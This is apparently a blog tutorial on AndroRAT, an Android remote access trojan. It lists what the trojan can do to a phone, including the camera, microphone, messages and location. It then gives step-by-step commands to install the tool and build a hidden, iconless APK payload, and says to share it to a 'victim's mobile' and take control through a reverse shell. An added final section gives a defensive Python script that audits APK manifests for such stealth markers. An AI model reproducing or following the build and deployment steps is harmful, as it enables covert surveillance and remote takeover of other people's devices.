What is AndroRAT?
You have probably heard of a RAT. No, we are not talking about a mouse, but about a Remote Access Trojan (RAT). It is dangerous malware that is used for hacking and monitoring. With its help, any phone or computer can be hacked in a few seconds and controlled remotely. But the question is how? What is a RAT (Remote Access Trojan), and how does it work? Let's find out.
RAT (Remote Access Trojan)
As you all know, a malware attack is one of the most popular methods of hacking, and it covers many types of malware, such as viruses, Trojans, worms, rootkits, ransomware, spyware, RATs, logic bombs, keyloggers and botnets. Here we will only talk about the RAT (Remote Access Trojan).
A RAT and a Trojan Horse have many similarities, but their purpose and way of working are completely different. A Trojan Horse is used for data theft, while a RAT is used for tasks like spying and monitoring. One feature is common to both: with either of them, the device can be controlled remotely and user activities can be tracked. But the question is, what is a RAT, and how dangerous is it? Let's find out.
What is RAT?
A RAT is a malware program that gives its user complete control over a target device and lets them control that device remotely. That is, with the help of a RAT, the user can target any device and control it from far away. The victim does not know about it, because the RAT works by hiding under the guise of other programs. The full form of RAT is Remote Access Trojan, but it is also called Remote Access Tool and Remote Administration Tool.
What can RAT do?
A RAT (Remote Access Trojan) can do almost anything, because it has administrative control. Specifically, a RAT can do the following:
- Can view, edit and delete the data present on the device.
- Can call any number, and can view and delete call history.
- Can read your emails and messages.
- Can send and delete emails and messages.
- Can browse the Internet, download files and see your browsing history.
- Can record photos and videos by turning on the camera.
- Can record audio by turning on the mic and listen to what you say.
- Can use and delete the apps and software present on the device.
- Can take screenshots.
- Can get the current location, SIM card details, IP address and MAC address of the device.
How to install AndroRAT in Termux
First you need to install Kali Nethunter (Kali Linux) in Termux, because this RAT can only run in Kali Nethunter. If you don't know how to install Kali Nethunter in Termux, then click below and see the post.
You can install AndroRAT with the following commands. Enter these commands in Kali Nethunter (Kali Linux), not in Termux.
To open Kali Nethunter (Kali Linux) in Termux, just type nh -r and hit enter.
(NOTE: Use this RAT at your own risk. I am not responsible for any illegal activities carried out using this RAT.)
apt-get update
apt-get upgrade -y
git clone https://github.com/karma9874/AndroRAT.git
cd AndroRAT
pip install colorama
pip install -r requirements.txt
To build the APK payload file, use the following command.
If you want to attack over a WAN network, replace 127.0.0.1 with your IP address and 4444 with your port number.
If you want to create a hidden payload without an icon, enter the command below.
python3 androRAT.py --build -i 127.0.0.1 -p 4444 -o /sdcard/sandeep.apk
To see the hidden payload or uninstall it, open your phone's dialer and dial *#*#1337#*#*
If you want to create a payload with an icon, enter the command below.
python3 androRAT.py --build -icon -i 127.0.0.1 -p 4444 -o /sdcard/sandeep.apk
Now wait 1-2 minutes, and the sandeep.apk payload file will be saved in your phone's internal storage.
Now share this file to your victim's mobile and install it.
To take control of the victim's mobile, use the following command.
Replace the IP address (-i) and port (-p) with the ones you used when creating the payload.
python3 androRAT.py --shell -i 127.0.0.1 -p 4444
You will see the connection from the victim's mobile. Type the help command to see the command list.
That's it!
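Seen from the defender's side, the capabilities listed under "What can RAT do?" and the hidden, dialer-code build described above both leave traces in an APK's manifest. The following is an added example, not code from the original post or from the AndroRAT project: it audits a manifest already decoded to text XML (for example with apktool). It assumes a hidden build registers Android's standard secret-code broadcast; the sample manifest, the permission shortlist and the threshold of four are constructed for illustration.

```python
import xml.etree.ElementTree as ET

A = "{http://schemas.android.com/apk/res/android}"  # android: attribute namespace
# Permissions behind the capabilities in the "What can RAT do?" list (shortlist, assumed).
RISKY = {
    "android.permission.CAMERA": "camera",
    "android.permission.RECORD_AUDIO": "microphone",
    "android.permission.READ_SMS": "read messages",
    "android.permission.READ_CALL_LOG": "call history",
    "android.permission.CALL_PHONE": "place calls",
    "android.permission.ACCESS_FINE_LOCATION": "location",
    "android.permission.READ_PHONE_STATE": "SIM and device details",
}
SECRET_ACTIONS = {"android.provider.Telephony.SECRET_CODE",
                  "android.telephony.action.SECRET_CODE"}

def audit_manifest(xml_text):
    """Report surveillance capabilities and stealth markers in a decoded manifest."""
    root = ET.fromstring(xml_text)
    perms = {e.get(A + "name") for e in root.iter("uses-permission")}
    caps = sorted(RISKY[p] for p in perms if p in RISKY)
    cats = {e.get(A + "name") for e in root.iter("category")}
    hidden = "android.intent.category.LAUNCHER" not in cats  # no app-drawer icon
    codes = []
    for filt in root.iter("intent-filter"):
        if SECRET_ACTIONS & {a.get(A + "name") for a in filt.iter("action")}:
            codes += [d.get(A + "host") for d in filt.iter("data")
                      if d.get(A + "scheme") == "android_secret_code" and d.get(A + "host")]
    network = "android.permission.INTERNET" in perms
    # Heuristic (an assumption of this example): broad access + network + stealth.
    suspicious = len(caps) >= 4 and network and (hidden or bool(codes))
    return {"capabilities": caps, "hidden_icon": hidden,
            "dialer_codes": sorted(codes), "suspicious": suspicious}

# Constructed sample manifest, not taken from any real APK.
SAMPLE = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.constructed">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.CAMERA"/>
  <uses-permission android:name="android.permission.RECORD_AUDIO"/>
  <uses-permission android:name="android.permission.READ_SMS"/>
  <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
  <application><receiver android:name=".Dial"><intent-filter>
    <action android:name="android.provider.Telephony.SECRET_CODE"/>
    <data android:scheme="android_secret_code" android:host="1337"/>
  </intent-filter></receiver></application>
</manifest>"""

if __name__ == "__main__": print(audit_manifest(SAMPLE))
```

An app with no launcher icon is not malicious by itself (many system components have none), so the check only flags the combination with broad sensitive permissions and network access.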